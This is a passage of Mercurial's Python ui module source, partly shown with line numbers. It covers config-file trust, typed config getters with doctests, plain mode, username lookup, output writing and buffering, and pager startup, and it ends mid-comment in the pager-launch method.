414 414 if b'*' in tusers or b'*' in tgroups:
415 415 return True
416 416
417 417 user = util.username(st.st_uid)
418 418 group = util.groupname(st.st_gid)
419 419 if user in tusers or group in tgroups or user == util.username():
420 420 return True
421 421
422 422 if self._reportuntrusted:
423 423 self.warn(
424 424 _(
425 425 b'not trusting file %s from untrusted '
426 426 b'user %s, group %s\n'
427 427 )
428 428 % (f, user, group)
429 429 )
430 430 return False
431 431
432 432 def read_resource_config(
433 433 self, name, root=None, trust=False, sections=None, remap=None
434 434 ):
435 435 try:
436 436 fp = resourceutil.open_resource(name[0], name[1])
437 437 except IOError:
438 438 if not sections: # ignore unless we were looking for something
439 439 return
440 440 raise
441 441
442 442 self._readconfig(
443 443 b'resource:%s.%s' % name, fp, root, trust, sections, remap
444 444 )
445 445
446 446 def readconfig(
447 447 self, filename, root=None, trust=False, sections=None, remap=None
448 448 ):
449 449 try:
450 450 fp = open(filename, 'rb')
451 451 except IOError:
452 452 if not sections: # ignore unless we were looking for something
453 453 return
454 454 raise
455 455
456 456 self._readconfig(filename, fp, root, trust, sections, remap)
457 457
458 458 def _readconfig(
459 459 self, filename, fp, root=None, trust=False, sections=None, remap=None
460 460 ):
461 461 with fp:
462 462 cfg = config.config()
463 463 trusted = sections or trust or self._trusted(fp, filename)
464 464
465 465 try:
466 466 cfg.read(filename, fp, sections=sections, remap=remap)
467 467 except error.ParseError as inst:
468 468 if trusted:
469 469 raise
470 470 self.warn(_(b'ignored: %s\n') % stringutil.forcebytestr(inst))
471 471
472 472 self._applyconfig(cfg, trusted, root)
473 473
474 474 def applyconfig(self, configitems, source=b"", root=None):
475 475 """Add configitems from a non-file source. Unlike with ``setconfig()``,
476 476 they can be overridden by subsequent config file reads. The items are
477 477 in the same format as ``configoverride()``, namely a dict of the
478 478 following structures: {(section, name) : value}
479 479
480 480 Typically this is used by extensions that inject themselves into the
481 481 config file load procedure by monkeypatching ``localrepo.loadhgrc()``.
482 482 """
483 483 cfg = config.config()
484 484
485 485 for (section, name), value in configitems.items():
486 486 cfg.set(section, name, value, source)
487 487
488 488 self._applyconfig(cfg, True, root)
489 489
    def _applyconfig(self, cfg, trusted, root):
        """Merge parsed config ``cfg`` into this ui's config layers.

        Under HGPLAIN, output-affecting ui options and the defaults/commands
        (and, unless excepted, alias) sections are stripped first so that
        scripted output stays stable.  The untrusted layer always receives
        the new values; the trusted layer only does when ``trusted`` is
        true.  Explicit overrides (``_ocfg``) are re-applied on top so they
        keep precedence over file-provided values.
        """
        if self.plain():
            # scrub ui options that change output or behavior in plain mode
            for k in (
                b'debug',
                b'fallbackencoding',
                b'quiet',
                b'slash',
                b'logtemplate',
                b'message-output',
                b'statuscopies',
                b'style',
                b'traceback',
                b'verbose',
            ):
                if k in cfg[b'ui']:
                    del cfg[b'ui'][k]
            for k, v in cfg.items(b'defaults'):
                del cfg[b'defaults'][k]
            for k, v in cfg.items(b'commands'):
                del cfg[b'commands'][k]
            # Don't remove aliases from the configuration if in the exceptionlist
            if self.plain(b'alias'):
                for k, v in cfg.items(b'alias'):
                    del cfg[b'alias'][k]
            if self.plain(b'revsetalias'):
                for k, v in cfg.items(b'revsetalias'):
                    del cfg[b'revsetalias'][k]
            if self.plain(b'templatealias'):
                for k, v in cfg.items(b'templatealias'):
                    del cfg[b'templatealias'][k]

        if trusted:
            self._tcfg.update(cfg)
            self._tcfg.update(self._ocfg)  # overrides win over file config
        self._ucfg.update(cfg)
        self._ucfg.update(self._ocfg)

        if root is None:
            root = os.path.expanduser(b'~')
        self.fixconfig(root=root)
530 530
    def fixconfig(self, root=None, section=None):
        """Recompute state derived from the configuration.

        Called after any config change.  ``section`` restricts the work to
        one section (None means all): path values are expanded and made
        absolute relative to ``root``, ui flags are re-read, trust lists
        are refreshed, and debug logging is (re)installed.
        """
        if section in (None, b'paths'):
            # expand vars and ~
            # translate paths relative to root (or home) into absolute paths
            root = root or encoding.getcwd()
            for c in self._tcfg, self._ucfg, self._ocfg:
                for n, p in c.items(b'paths'):
                    # Ignore sub-options.
                    if b':' in n:
                        continue
                    if not p:
                        continue
                    if b'%%' in p:
                        # legacy escaping of literal '%'; warn and unescape
                        s = self.configsource(b'paths', n) or b'none'
                        self.warn(
                            _(b"(deprecated '%%' in path %s=%s from %s)\n")
                            % (n, p, s)
                        )
                        p = p.replace(b'%%', b'%')
                    p = util.expandpath(p)
                    if not util.hasscheme(p) and not os.path.isabs(p):
                        p = os.path.normpath(os.path.join(root, p))
                    c.set(b"paths", n, p)

        if section in (None, b'ui'):
            # update ui options
            self._fmsgout, self._fmsgerr = _selectmsgdests(self)
            self.debugflag = self.configbool(b'ui', b'debug')
            self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
            self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
            # verbose and quiet are contradictory; drop both if both set
            if self.verbose and self.quiet:
                self.quiet = self.verbose = False
            self._reportuntrusted = self.debugflag or self.configbool(
                b"ui", b"report_untrusted"
            )
            self.showtimestamp = self.configbool(b'ui', b'timestamp-output')
            self.tracebackflag = self.configbool(b'ui', b'traceback')
            self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')

        if section in (None, b'trusted'):
            # update trust information
            self._trustusers.update(self.configlist(b'trusted', b'users'))
            self._trustgroups.update(self.configlist(b'trusted', b'groups'))

        if section in (None, b'devel', b'ui') and self.debugflag:
            tracked = set()
            if self.configbool(b'devel', b'debug.extensions'):
                tracked.add(b'extension')
            if tracked:
                logger = loggingutil.fileobjectlogger(self._ferr, tracked)
                self.setlogger(b'debug', logger)
582 582
583 583 def backupconfig(self, section, item):
584 584 return (
585 585 self._ocfg.backup(section, item),
586 586 self._tcfg.backup(section, item),
587 587 self._ucfg.backup(section, item),
588 588 )
589 589
590 590 def restoreconfig(self, data):
591 591 self._ocfg.restore(data[0])
592 592 self._tcfg.restore(data[1])
593 593 self._ucfg.restore(data[2])
594 594
595 595 def setconfig(self, section, name, value, source=b''):
596 596 for cfg in (self._ocfg, self._tcfg, self._ucfg):
597 597 cfg.set(section, name, value, source)
598 598 self.fixconfig(section=section)
599 599 self._maybetweakdefaults()
600 600
601 601 def _data(self, untrusted):
602 602 return untrusted and self._ucfg or self._tcfg
603 603
604 604 def configsource(self, section, name, untrusted=False):
605 605 return self._data(untrusted).source(section, name)
606 606
607 607 def config(self, section, name, default=_unset, untrusted=False):
608 608 """return the plain string version of a config"""
609 609 value = self._config(
610 610 section, name, default=default, untrusted=untrusted
611 611 )
612 612 if value is _unset:
613 613 return None
614 614 return value
615 615
    def _config(self, section, name, default=_unset, untrusted=False):
        """Look up ``section.name``, consulting registered item metadata.

        Returns the configured value if set; otherwise the caller-supplied
        ``default`` or the registered item's default; ``_unset`` when
        nothing applies.  Emits devel warnings for unregistered items and
        for callers whose explicit ``default`` disagrees with the
        registered one.
        """
        value = itemdefault = default
        item = self._knownconfig.get(section, {}).get(name)
        alternates = [(section, name)]

        if item is not None:
            # also consult any registered alias (old section/name pairs)
            alternates.extend(item.alias)
            if callable(item.default):
                itemdefault = item.default()
            else:
                itemdefault = item.default
        else:
            msg = b"accessing unregistered config item: '%s.%s'"
            msg %= (section, name)
            self.develwarn(msg, 2, b'warn-config-unknown')

        if default is _unset:
            # caller gave no default; fall back to the registered one
            if item is None:
                value = default
            elif item.default is configitems.dynamicdefault:
                value = None
                msg = b"config item requires an explicit default value: '%s.%s'"
                msg %= (section, name)
                self.develwarn(msg, 2, b'warn-config-default')
            else:
                value = itemdefault
        elif (
            item is not None
            and item.default is not configitems.dynamicdefault
            and default != itemdefault
        ):
            msg = (
                b"specifying a mismatched default value for a registered "
                b"config item: '%s.%s' '%s'"
            )
            msg %= (section, name, pycompat.bytestr(default))
            self.develwarn(msg, 2, b'warn-config-default')

        # first configured name (main or alias) wins
        for s, n in alternates:
            candidate = self._data(untrusted).get(s, n, None)
            if candidate is not None:
                value = candidate
                break

        if self.debugflag and not untrusted and self._reportuntrusted:
            for s, n in alternates:
                uvalue = self._ucfg.get(s, n)
                if uvalue is not None and uvalue != value:
                    self.debug(
                        b"ignoring untrusted configuration option "
                        b"%s.%s = %s\n" % (s, n, uvalue)
                    )
        return value
669 669
670 670 def configsuboptions(self, section, name, default=_unset, untrusted=False):
671 671 """Get a config option and all sub-options.
672 672
673 673 Some config options have sub-options that are declared with the
674 674 format "key:opt = value". This method is used to return the main
675 675 option and all its declared sub-options.
676 676
677 677 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
678 678 is a dict of defined sub-options where keys and values are strings.
679 679 """
680 680 main = self.config(section, name, default, untrusted=untrusted)
681 681 data = self._data(untrusted)
682 682 sub = {}
683 683 prefix = b'%s:' % name
684 684 for k, v in data.items(section):
685 685 if k.startswith(prefix):
686 686 sub[k[len(prefix) :]] = v
687 687
688 688 if self.debugflag and not untrusted and self._reportuntrusted:
689 689 for k, v in sub.items():
690 690 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
691 691 if uvalue is not None and uvalue != v:
692 692 self.debug(
693 693 b'ignoring untrusted configuration option '
694 694 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
695 695 )
696 696
697 697 return main, sub
698 698
    def configpath(self, section, name, default=_unset, untrusted=False):
        """get a path config item, expanded relative to repo root or config
        file"""
        v = self.config(section, name, default, untrusted)
        if v is None:
            return None
        # NOTE(review): this `or` makes every non-URL value take the
        # expansion branch (harmless for absolute paths, since joining an
        # absolute second argument ignores the base) -- confirm `and` was
        # not intended before changing it.
        if not os.path.isabs(v) or b"://" not in v:
            src = self.configsource(section, name, untrusted)
            if b':' in src:
                # source presumably looks like "file:line"; expand relative
                # to the directory containing that config file
                base = os.path.dirname(src.rsplit(b':')[0])
                v = os.path.join(base, os.path.expanduser(v))
        return v
711 711
    def configbool(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a boolean

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'true', b'yes')
        >>> u.configbool(s, b'true')
        True
        >>> u.setconfig(s, b'false', b'no')
        >>> u.configbool(s, b'false')
        False
        >>> u.configbool(s, b'unknown')
        False
        >>> u.configbool(s, b'unknown', True)
        True
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configbool(s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a boolean ('somevalue')
        """

        v = self._config(section, name, default, untrusted=untrusted)
        if v is None:
            return v
        if v is _unset:
            # nothing configured and no registered default: absent -> False
            if default is _unset:
                return False
            return default
        if isinstance(v, bool):
            # already a bool (e.g. set programmatically); no parsing needed
            return v
        b = stringutil.parsebool(v)
        if b is None:
            raise error.ConfigError(
                _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
            )
        return b
748 748
    def configwith(
        self, convert, section, name, default=_unset, desc=None, untrusted=False
    ):
        """parse a configuration element with a conversion function

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'float1', b'42')
        >>> u.configwith(float, s, b'float1')
        42.0
        >>> u.setconfig(s, b'float2', b'-4.25')
        >>> u.configwith(float, s, b'float2')
        -4.25
        >>> u.configwith(float, s, b'unknown', 7)
        7.0
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configwith(float, s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a valid float ('somevalue')
        >>> u.configwith(float, s, b'invalid', desc=b'womble')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a valid womble ('somevalue')
        """

        v = self.config(section, name, default, untrusted)
        if v is None:
            return v  # do not attempt to convert None
        try:
            return convert(v)
        except (ValueError, error.ParseError):
            if desc is None:
                # fall back to the converter's name for the error message
                desc = pycompat.sysbytes(convert.__name__)
            raise error.ConfigError(
                _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
            )
785 785
    def configint(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as an integer

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'int1', b'42')
        >>> u.configint(s, b'int1')
        42
        >>> u.setconfig(s, b'int2', b'-42')
        >>> u.configint(s, b'int2')
        -42
        >>> u.configint(s, b'unknown', 7)
        7
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configint(s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a valid integer ('somevalue')
        """

        # defer to configwith() with int as the converter
        return self.configwith(
            int, section, name, default, b'integer', untrusted
        )
808 808
    def configbytes(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a quantity in bytes

        Units can be specified as b (bytes), k or kb (kilobytes), m or
        mb (megabytes), g or gb (gigabytes).

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'val1', b'42')
        >>> u.configbytes(s, b'val1')
        42
        >>> u.setconfig(s, b'val2', b'42.5 kb')
        >>> u.configbytes(s, b'val2')
        43520
        >>> u.configbytes(s, b'unknown', b'7 MB')
        7340032
        >>> u.setconfig(s, b'invalid', b'somevalue')
        >>> u.configbytes(s, b'invalid')
        Traceback (most recent call last):
            ...
        ConfigError: foo.invalid is not a byte quantity ('somevalue')
        """

        value = self._config(section, name, default, untrusted)
        if value is _unset:
            if default is _unset:
                default = 0
            value = default
        if not isinstance(value, bytes):
            # already a number (programmatic default); pass through unparsed
            return value
        try:
            return util.sizetoint(value)
        except error.ParseError:
            raise error.ConfigError(
                _(b"%s.%s is not a byte quantity ('%s')")
                % (section, name, value)
            )
845 845
    def configlist(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a list of comma/space separated
        strings

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
        >>> u.configlist(s, b'list1')
        ['this', 'is', 'a small', 'test']
        >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
        >>> u.configlist(s, b'list2')
        ['this', 'is', 'a small', 'test']
        """
        # default is not always a list
        v = self.configwith(
            config.parselist, section, name, default, b'list', untrusted
        )
        if isinstance(v, bytes):
            # a bytes default came back unconverted; parse it here
            return config.parselist(v)
        elif v is None:
            return []
        return v
867 867
    def configdate(self, section, name, default=_unset, untrusted=False):
        """parse a configuration element as a tuple of ints

        >>> u = ui(); s = b'foo'
        >>> u.setconfig(s, b'date', b'0 0')
        >>> u.configdate(s, b'date')
        (0, 0)
        """
        # only parse when a (truthy) value is actually configured;
        # otherwise hand back the caller's default unparsed
        if self.config(section, name, default, untrusted):
            return self.configwith(
                dateutil.parsedate, section, name, default, b'date', untrusted
            )
        if default is _unset:
            return None
        return default
883 883
884 884 def configdefault(self, section, name):
885 885 """returns the default value of the config item"""
886 886 item = self._knownconfig.get(section, {}).get(name)
887 887 itemdefault = None
888 888 if item is not None:
889 889 if callable(item.default):
890 890 itemdefault = item.default()
891 891 else:
892 892 itemdefault = item.default
893 893 return itemdefault
894 894
895 895 def hasconfig(self, section, name, untrusted=False):
896 896 return self._data(untrusted).hasitem(section, name)
897 897
898 898 def has_section(self, section, untrusted=False):
899 899 '''tell whether section exists in config.'''
900 900 return section in self._data(untrusted)
901 901
902 902 def configitems(self, section, untrusted=False, ignoresub=False):
903 903 items = self._data(untrusted).items(section)
904 904 if ignoresub:
905 905 items = [i for i in items if b':' not in i[0]]
906 906 if self.debugflag and not untrusted and self._reportuntrusted:
907 907 for k, v in self._ucfg.items(section):
908 908 if self._tcfg.get(section, k) != v:
909 909 self.debug(
910 910 b"ignoring untrusted configuration option "
911 911 b"%s.%s = %s\n" % (section, k, v)
912 912 )
913 913 return items
914 914
915 915 def walkconfig(self, untrusted=False):
916 916 cfg = self._data(untrusted)
917 917 for section in cfg.sections():
918 918 for name, value in self.configitems(section, untrusted):
919 919 yield section, name, value
920 920
    def plain(self, feature=None):
        '''is plain mode active?

        Plain mode means that all configuration variables which affect
        the behavior and output of Mercurial should be
        ignored. Additionally, the output should be stable,
        reproducible and suitable for use in scripts or applications.

        The only way to trigger plain mode is by setting either the
        `HGPLAIN' or `HGPLAINEXCEPT' environment variables.

        The return value can either be
        - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
        - False if feature is disabled by default and not included in HGPLAIN
        - True otherwise
        '''
        if (
            b'HGPLAIN' not in encoding.environ
            and b'HGPLAINEXCEPT' not in encoding.environ
        ):
            return False
        exceptions = (
            encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
        )
        # TODO: add support for HGPLAIN=+feature,-feature syntax
        # strictflags is opt-in: treat it as excepted unless it is
        # explicitly enabled via HGPLAIN=+strictflags
        if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
            b','
        ):
            exceptions.append(b'strictflags')
        if feature and exceptions:
            return feature not in exceptions
        return True
953 953
    def username(self, acceptempty=False):
        """Return default username to be used in commits.

        Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
        and stop searching if one of these is set.
        If not found and acceptempty is True, returns None.
        If not found and ui.askusername is True, ask the user, else use
        ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
        If no username could be found, raise an Abort error.
        """
        # $HGUSER has highest priority
        user = encoding.environ.get(b"HGUSER")
        if user is None:
            user = self.config(b"ui", b"username")
            if user is not None:
                # config value may embed environment references
                user = os.path.expandvars(user)
        if user is None:
            user = encoding.environ.get(b"EMAIL")
        if user is None and acceptempty:
            return user
        if user is None and self.configbool(b"ui", b"askusername"):
            user = self.prompt(_(b"enter a commit username:"), default=None)
        if user is None and not self.interactive():
            # last resort: synthesize user@fqdn (may raise KeyError if the
            # system user cannot be determined)
            try:
                user = b'%s@%s' % (
                    procutil.getuser(),
                    encoding.strtolocal(socket.getfqdn()),
                )
                self.warn(_(b"no username found, using '%s' instead\n") % user)
            except KeyError:
                pass
        if not user:
            raise error.Abort(
                _(b'no username supplied'),
                hint=_(b"use 'hg config --edit' " b'to set your username'),
            )
        # a newline would corrupt the commit metadata
        if b"\n" in user:
            raise error.Abort(
                _(b"username %r contains a newline\n") % pycompat.bytestr(user)
            )
        return user
994 994
995 995 def shortuser(self, user):
996 996 """Return a short representation of a user name or email address."""
997 997 if not self.verbose:
998 998 user = stringutil.shortuser(user)
999 999 return user
1000 1000
1001 1001 def expandpath(self, loc, default=None):
1002 1002 """Return repository location relative to cwd or from [paths]"""
1003 1003 try:
1004 1004 p = self.paths.getpath(loc)
1005 1005 if p:
1006 1006 return p.rawloc
1007 1007 except error.RepoError:
1008 1008 pass
1009 1009
1010 1010 if default:
1011 1011 try:
1012 1012 p = self.paths.getpath(default)
1013 1013 if p:
1014 1014 return p.rawloc
1015 1015 except error.RepoError:
1016 1016 pass
1017 1017
1018 1018 return loc
1019 1019
    @util.propertycache
    def paths(self):
        # registry of configured [paths]; built lazily and cached on the
        # instance by util.propertycache
        return paths(self)
1023 1023
    @property
    def fout(self):
        # primary output stream
        return self._fout

    @fout.setter
    def fout(self, f):
        self._fout = f
        # message destinations depend on the output streams; recompute
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1032 1032
    @property
    def ferr(self):
        # error output stream
        return self._ferr

    @ferr.setter
    def ferr(self, f):
        self._ferr = f
        # message destinations depend on the output streams; recompute
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1041 1041
    @property
    def fin(self):
        # input stream; no derived state to refresh on assignment
        return self._fin

    @fin.setter
    def fin(self, f):
        self._fin = f
1049 1049
    @property
    def fmsg(self):
        """Stream dedicated for status/error messages; may be None if
        fout/ferr are used"""
        return self._fmsg

    @fmsg.setter
    def fmsg(self, f):
        self._fmsg = f
        # message destinations depend on this stream; recompute
        self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1060 1060
1061 1061 def pushbuffer(self, error=False, subproc=False, labeled=False):
1062 1062 """install a buffer to capture standard output of the ui object
1063 1063
1064 1064 If error is True, the error output will be captured too.
1065 1065
1066 1066 If subproc is True, output from subprocesses (typically hooks) will be
1067 1067 captured too.
1068 1068
1069 1069 If labeled is True, any labels associated with buffered
1070 1070 output will be handled. By default, this has no effect
1071 1071 on the output returned, but extensions and GUI tools may
1072 1072 handle this argument and returned styled output. If output
1073 1073 is being buffered so it can be captured and parsed or
1074 1074 processed, labeled should not be set to True.
1075 1075 """
1076 1076 self._buffers.append([])
1077 1077 self._bufferstates.append((error, subproc, labeled))
1078 1078 self._bufferapplylabels = labeled
1079 1079
1080 1080 def popbuffer(self):
1081 1081 '''pop the last buffer and return the buffered output'''
1082 1082 self._bufferstates.pop()
1083 1083 if self._bufferstates:
1084 1084 self._bufferapplylabels = self._bufferstates[-1][2]
1085 1085 else:
1086 1086 self._bufferapplylabels = None
1087 1087
1088 1088 return b"".join(self._buffers.pop())
1089 1089
1090 1090 def _isbuffered(self, dest):
1091 1091 if dest is self._fout:
1092 1092 return bool(self._buffers)
1093 1093 if dest is self._ferr:
1094 1094 return bool(self._bufferstates and self._bufferstates[-1][0])
1095 1095 return False
1096 1096
1097 1097 def canwritewithoutlabels(self):
1098 1098 '''check if write skips the label'''
1099 1099 if self._buffers and not self._bufferapplylabels:
1100 1100 return True
1101 1101 return self._colormode is None
1102 1102
1103 1103 def canbatchlabeledwrites(self):
1104 1104 '''check if write calls with labels are batchable'''
1105 1105 # Windows color printing is special, see ``write``.
1106 1106 return self._colormode != b'win32'
1107 1107
    def write(self, *args, **opts):
        '''write args to output

        By default, this method simply writes to the buffer or stdout.
        Color mode can be set on the UI class to have the output decorated
        with color modifier before being written to stdout.

        The color used is controlled by an optional keyword argument, "label".
        This should be a string containing label names separated by space.
        Label names take the form of "topic.type". For example, ui.debug()
        issues a label of "ui.debug".

        Progress reports via stderr are normally cleared before writing as
        stdout and stderr go to the same terminal. This can be skipped with
        the optional keyword argument "keepprogressbar". The progress bar
        will continue to occupy a partial line on stderr in that case.
        This functionality is intended when Mercurial acts as data source
        in a pipe.

        When labeling output for a specific command, a label of
        "cmdname.type" is recommended. For example, status issues
        a label of "status.modified" for modified files.
        '''
        dest = self._fout

        # inlined _write() for speed
        if self._buffers:
            # buffered: accumulate (optionally labeled) chunks for popbuffer()
            label = opts.get('label', b'')
            if label and self._bufferapplylabels:
                self._buffers[-1].extend(self.label(a, label) for a in args)
            else:
                self._buffers[-1].extend(args)
            return

        # inlined _writenobuf() for speed
        if not opts.get('keepprogressbar', False):
            self._progclear()
        msg = b''.join(args)

        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            if self._colormode == b'win32':
                # windows color printing is its own can of crab, defer to
                # the color module and that is it.
                color.win32print(self, dest.write, msg, **opts)
            else:
                if self._colormode is not None:
                    label = opts.get('label', b'')
                    msg = self.label(msg, label)
                dest.write(msg)
        except IOError as err:
            raise error.StdioError(err)
        finally:
            self._blockedtimes[b'stdio_blocked'] += (
                util.timer() - starttime
            ) * 1000
1165 1165
    def write_err(self, *args, **opts):
        # like write(), but targeting the error stream
        self._write(self._ferr, *args, **opts)
1168 1168
1169 1169 def _write(self, dest, *args, **opts):
1170 1170 # update write() as well if you touch this code
1171 1171 if self._isbuffered(dest):
1172 1172 label = opts.get('label', b'')
1173 1173 if label and self._bufferapplylabels:
1174 1174 self._buffers[-1].extend(self.label(a, label) for a in args)
1175 1175 else:
1176 1176 self._buffers[-1].extend(args)
1177 1177 else:
1178 1178 self._writenobuf(dest, *args, **opts)
1179 1179
    def _writenobuf(self, dest, *args, **opts):
        """Write directly to ``dest``, bypassing any capture buffers."""
        # update write() as well if you touch this code
        if not opts.get('keepprogressbar', False):
            self._progclear()
        msg = b''.join(args)

        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            # flush stdout before writing to stderr so interleaved output
            # stays ordered when both go to the same terminal
            if dest is self._ferr and not getattr(self._fout, 'closed', False):
                self._fout.flush()
            if getattr(dest, 'structured', False):
                # channel for machine-readable output with metadata, where
                # no extra colorization is necessary.
                dest.write(msg, **opts)
            elif self._colormode == b'win32':
                # windows color printing is its own can of crab, defer to
                # the color module and that is it.
                color.win32print(self, dest.write, msg, **opts)
            else:
                if self._colormode is not None:
                    label = opts.get('label', b'')
                    msg = self.label(msg, label)
                dest.write(msg)
            # stderr may be buffered under win32 when redirected to files,
            # including stdout.
            if dest is self._ferr and not getattr(dest, 'closed', False):
                dest.flush()
        except IOError as err:
            if dest is self._ferr and err.errno in (
                errno.EPIPE,
                errno.EIO,
                errno.EBADF,
            ):
                # no way to report the error, so ignore it
                return
            raise error.StdioError(err)
        finally:
            self._blockedtimes[b'stdio_blocked'] += (
                util.timer() - starttime
            ) * 1000
1221 1221
    def _writemsg(self, dest, *args, **opts):
        """Write a status/error message, optionally timestamp-prefixed.

        When ui.timestamp-output is enabled, messages of the listed types
        get an ISO-format wall-clock prefix and are flushed immediately so
        the timestamp stays meaningful.
        """
        timestamp = self.showtimestamp and opts.get('type') in {
            b'debug',
            b'error',
            b'note',
            b'status',
            b'warning',
        }
        if timestamp:
            args = (
                b'[%s] '
                % pycompat.bytestr(datetime.datetime.now().isoformat()),
            ) + args
        _writemsgwith(self._write, dest, *args, **opts)
        if timestamp:
            dest.flush()
1238 1238
    def _writemsgnobuf(self, dest, *args, **opts):
        # unbuffered variant of _writemsg() (no timestamping here)
        _writemsgwith(self._writenobuf, dest, *args, **opts)
1241 1241
    def flush(self):
        """Flush both output streams, swallowing broken-pipe-style errors.

        EPIPE/EIO/EBADF mean the reader went away; there is nothing useful
        to report, so only other IOErrors are surfaced as StdioError.  The
        nested try/finally guarantees ferr is flushed even if fout fails.
        """
        # opencode timeblockedsection because this is a critical path
        starttime = util.timer()
        try:
            try:
                self._fout.flush()
            except IOError as err:
                if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                    raise error.StdioError(err)
        finally:
            try:
                self._ferr.flush()
            except IOError as err:
                if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
                    raise error.StdioError(err)
            finally:
                self._blockedtimes[b'stdio_blocked'] += (
                    util.timer() - starttime
                ) * 1000
1261 1261
1262 1262 def _isatty(self, fh):
1263 1263 if self.configbool(b'ui', b'nontty'):
1264 1264 return False
1265 1265 return procutil.isatty(fh)
1266 1266
    def protectfinout(self):
        """Duplicate ui streams and redirect original if they are stdio

        Returns (fin, fout) which point to the original ui fds, but may be
        copy of them. The returned streams can be considered "owned" in that
        print(), exec(), etc. never reach to them.
        """
        if self._finoutredirected:
            # if already redirected, protectstdio() would just create another
            # nullfd pair, which is equivalent to returning self._fin/_fout.
            return self._fin, self._fout
        fin, fout = procutil.protectstdio(self._fin, self._fout)
        # only flag redirection when protectstdio actually swapped streams
        self._finoutredirected = (fin, fout) != (self._fin, self._fout)
        return fin, fout
1281 1281
    def restorefinout(self, fin, fout):
        """Restore ui streams from possibly duplicated (fin, fout)"""
        if (fin, fout) == (self._fin, self._fout):
            # nothing was duplicated; nothing to restore
            return
        procutil.restorestdio(self._fin, self._fout, fin, fout)
        # protectfinout() won't create more than one duplicated streams,
        # so we can just turn the redirection flag off.
        self._finoutredirected = False
1290 1290
    @contextlib.contextmanager
    def protectedfinout(self):
        """Run code block with protected standard streams"""
        fin, fout = self.protectfinout()
        try:
            yield fin, fout
        finally:
            # always undo the redirection, even if the block raised
            self.restorefinout(fin, fout)
1299 1299
    def disablepager(self):
        # permanently disable the pager for this ui instance; pager() is a
        # no-op afterwards
        self._disablepager = True
1302 1302
    def pager(self, command):
        """Start a pager for subsequent command output.

        Commands which produce a long stream of output should call
        this function to activate the user's preferred pagination
        mechanism (which may be no pager). Calling this function
        precludes any future use of interactive functionality, such as
        prompting the user or activating curses.

        Args:
          command: The full, non-aliased name of the command. That is, "log"
                   not "history, "summary" not "summ", etc.
        """
        if self._disablepager or self.pageractive:
            # how pager should do is already determined
            return

        if not command.startswith(b'internal-always-') and (
            # explicit --pager=on (= 'internal-always-' prefix) should
            # take precedence over disabling factors below
            command in self.configlist(b'pager', b'ignore')
            or not self.configbool(b'ui', b'paginate')
            or not self.configbool(b'pager', b'attend-' + command, True)
            or encoding.environ.get(b'TERM') == b'dumb'
            # TODO: if we want to allow HGPLAINEXCEPT=pager,
            # formatted() will need some adjustment.
            or not self.formatted()
            or self.plain()
            or self._buffers
            # TODO: expose debugger-enabled on the UI object
            or b'--debugger' in pycompat.sysargv
        ):
            # We only want to paginate if the ui appears to be
            # interactive, the user didn't say HGPLAIN or
            # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
            return

        pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
        if not pagercmd:
            return

        # environment defaults (e.g. for less) only when not already set
        pagerenv = {}
        for name, value in rcutil.defaultpagerenv().items():
            if name not in encoding.environ:
                pagerenv[name] = value

        self.debug(
            b'starting pager for command %s\n' % stringutil.pprint(command)
        )
        self.flush()

        wasformatted = self.formatted()
        if util.safehasattr(signal, b"SIGPIPE"):
            # pager exit must not kill us with SIGPIPE
            signal.signal(signal.SIGPIPE, _catchterm)
        if self._runpager(pagercmd, pagerenv):
            self.pageractive = True
            # Preserve the formatted-ness of the UI. This is important
            # because we mess with stdout, which might confuse
            # auto-detection of things being formatted.
            self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
            self.setconfig(b'ui', b'interactive', False, b'pager')

            # If pagermode differs from color.mode, reconfigure color now that
            # pageractive is set.
            cm = self._colormode
            if cm != self.config(b'color', b'pagermode', cm):
                color.setup(self)
        else:
            # If the pager can't be spawned in dispatch when --pager=on is
            # given, don't try again when the command runs, to avoid a duplicate
            # warning about a missing pager command.
            self.disablepager()
1375 1375
    def _runpager(self, command, env=None):
        """Actually start the pager and set up file descriptors.

        This is separate in part so that extensions (like chg) can
        override how a pager is invoked.

        Returns True if the pager was started and stdout/stderr were
        redirected into it, False if pagination was skipped.
        """
        if command == b'cat':
            # Save ourselves some work.
            return False
        # If the command doesn't contain any of these characters, we
        # assume it's a binary and exec it directly. This means for
        # simple pager command configurations, we can degrade
